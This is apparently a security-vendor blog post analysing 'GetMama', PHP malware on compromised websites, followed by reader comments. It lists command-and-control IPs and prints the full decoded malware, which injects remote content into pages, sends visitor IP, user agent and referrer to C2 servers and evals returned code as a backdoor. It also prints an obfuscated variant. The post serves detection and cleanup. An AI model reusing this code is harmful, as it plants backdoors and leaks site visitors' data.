GetMama - Conditional malware affecting thousands of sites

We have been tracking an interesting malware that is affecting thousands of compromised sites. We call it GetMama!!

Why conditional? Because instead of just displaying the malicious code to all the visitors of the web site, it connects back to its command and control server to find out what to do. It also sends back to the attackers the IP address, user agent and referrer of the person visiting the compromised site, so the command and control can determine if it should display the malicious content or not.

It also only displays the malicious content once a day per IP address and only to Windows users.

Why GetMama? Well, that’s how the malware authors called their own function (see sample in the bottom of the post).

COMMAND AND CONTROL (C2) SERVERS

Those are the command and control IP addresses. I recommend checking for traffic to these IP addresses and blocking them if possible:

78.46.173.14
176.9.218.191
91.228.154.254
77.81.241.253
184.82.117.110
46.4.202.93
46.249.58.135
176.9.241.150
46.37.169.56
46.30.41.99
94.242.255.35
178.162.129.223
78.47.184.33
31.184.234.96

For every request to the compromised sites, there will also be a random call to one of those. The called URL would look something like http://31.184.234.96/jedi.php?version=0991&mother=

MALICIOUS CODE

This is final decoded malware that gets executed on the compromised sites. For every request, it connects back to the attackers to determine what to do. The action could be to inject malware in the site, run a command in the server (it also acts as a backdoor) or to do nothing.

if (!function_exists("GetMama")){  

    function mod_con($buf){str_ireplace("<body>","<body>",$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf); return $buf;}str_ireplace("</body>","</body>",$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); return $buf;}

    return $buf;}function opanki($buf){$gz_e = false;$h_l = headers_list();if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true;}if ($gz_e){$tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = 
gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);} else {$contents = mod_con($buf);}$len = strlen($contents);header("Content-Length: ".$len);return($contents);} 

    function GetMama(){$mother = "compromisedsite.com";return $mother;}

    ob_start("opanki");

    function ahfudflfzdhfhs($pa){$mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER["HTTP_HOST"])){$host = $_SERVER["HTTP_HOST"];} else {$host = "";}if (isset($_SERVER["REMOTE_ADDR"])){$ip = $_SERVER["REMOTE_ADDR"];} else {$ip = "";}if (isset($_SERVER["HTTP_REFERER"])){$ref = urlencode($_SERVER["HTTP_REFERER"]);} else {$ref = "";}if (isset($_SERVER["HTTP_USER_AGENT"])){$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));} else {$ua = "";}if (isset($_SERVER["QUERY_STRING"])){$qs = urlencode($_SERVER["QUERY_STRING"]);} else {$qs = "";}

   $url_0 = "http://" . $pa;
   $url_1 = "/jedi.php?version=0991&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
   $try = true;

   if( function_exists("curl_init") ){$ch = curl_init($url_0 . $url_1);
       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
       curl_setopt($ch, CURLOPT_TIMEOUT, 3);
       $ult = trim(curl_exec($ch));
       $try = false;} 

    if ((ini_get("allow_url_fopen")) && $try) {$ult = trim(@file_get_contents($url_0 . $url_1));$try = false;}

    if($try){$fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) {$out = "GET $url_1 HTTP/1.0rn";
         $out .= "Host: $parn";
         $out .= "Connection: Closernrn";
         fwrite($fp, $out);
         $ret = "";
         while (!feof($fp)) {$ret  .=  fgets($fp, 128);}fclose($fp);$ult = trim(substr($ret, strpos($ret, "rnrn") + 4));}}  

    if (strpos($ult,"eval") !== false)
    {
        $z = stripslashes(str_replace("eval","",$ult)); eval($z); exit();
    }
    if (strpos($ult,"ebna") !== false){$_SERVER["good"] = str_replace("ebna","",$ult);return true;}
    else {return false;}}

    $father2[] = "78.46.173.14";
    $father2[] = "176.9.218.191";
    $father2[] = "91.228.154.254";
    $father2[] = "77.81.241.253";
    $father2[] = "184.82.117.110";
    $father2[] = "46.4.202.93";
    $father2[] = "46.249.58.135";
    $father2[] = "176.9.241.150";
    $father2[] = "46.37.169.56";
    $father2[] = "46.30.41.99";
    $father2[] = "94.242.255.35";
    $father2[] = "178.162.129.223";
    $father2[] = "78.47.184.33";
    $father2[] = "31.184.234.96";
    shuffle($father2);
    foreach($father2 as $ur){if ( ahfudflfzdhfhs($ur) ) { break ;}}}

HEAVILY ENCODED

Note that the malware will not look like that (all pretty) on the compromised site. It can be encoded like this:

$VDNjO60q6FJNnaRjb6MS3d5d= array(‘7920′,’7937′,’7916′,’7927’);$eVlnlmOOZXsWOJTjjxwj=
array(‘3733′,’3748′,’3735′,’3731′,’3750′,’3735′,’3729′,’3736′,’3751′,’3744′,’3733’,
‘3750’,’3739′,’3745′,’3744′);$albi35lY8fkUqy5DcKtZ2gECZNLn=
array(‘5781′,’5780′,’5798′,’5784′,’5737′,’5735′,’5778′,’5783′,’5784′,’5782′,’5794’,
‘5783’,’5784′);$aeMTktRM9OsQRAd5bpDQ7Bmj0ASq2z=”ZXZhbChiYXNlNjRfZGVjb2Rl…JYY683″);
$X7ry2SBupAHs89a1Fj06AYlUg2RO3VPSS6hKOI548Dm =
$V6uPJ50EnFVWUclEHg5TEJpQvcBf6g9XduCNpthDY2qI(‘$wnY8xO4XDfHK8pp1a4KS1RtGqo’,
$VyUF5BmxNFlWXVT3P.'(‘.$adCH8mcHCS3Fj8Bq8otsR6Hae.'($wnY8xO4XDfHK8pp1a4KS1RtGqo));’);
$X7ry2SBupAHs89a1Fj06AYlUg2RO3VPSS6hKOI548Dm($aeMTktRM9OsQRAd5bpDQ7Bmj0ASq2z);}

As you can see, its not using any of the normal “eval ( base64_decode” calls that webmasters are used to looking for. This malware has also evolved and it can be hidden in different ways.

We will post more details as we learn more about it.

Note that if your site is compromised, our free sitecheck scanner may miss this type of malware (because of the conditional way it works). If you think you are compromised, only our internal scans can find/clean it up.

Comments

Fsprincipe

April 10, 2012

how do we get rid of this? here’s another code i discovered on my site:
- Tony Perez
  
  April 10, 2012
  
  It depends, if you have it it’s likely injected itself in every PHP file. In this instance, replacing your core files won’t be enough. You’ll want to try and roll back to a previous version that is a known clean then go about hardening.
  - Fsprincipe
    
    April 12, 2012
    
    i was wondering how did this malware infected our sites, considering all the best efforts of hardening the wordpress installs..
Daniel

May 5, 2012

I’ve had this problem too and found the way how to get rid of the virus. I posted the way on my blog here.
Hedonist

June 6, 2012

I just found malicious code on my sites, after decoding it it did mention the get mama function but it have “eval ( base64_decode” written with it. Some of the IP addresses you mention overlapped with the ones inside the code, mine also contained some new ones. I’ve blocked all of them just in case, hopefully that was the right thing to do.

In my folders, I had a suspicious file called 22.php and it made a list of all the directories inside files called zaza_0, zaza_1 etc. However it didn’t infect any other php files, maybe I caught it just in time?

GetMama – Conditional malware affecting thousands of sites

COMMAND AND CONTROL (C2) SERVERS

MALICIOUS CODE

HEAVILY ENCODED

About Daniel Cid

Comments

COMMAND AND CONTROL (C2) SERVERS

MALICIOUS CODE

HEAVILY ENCODED

About Daniel Cid

Reader Interactions

Comments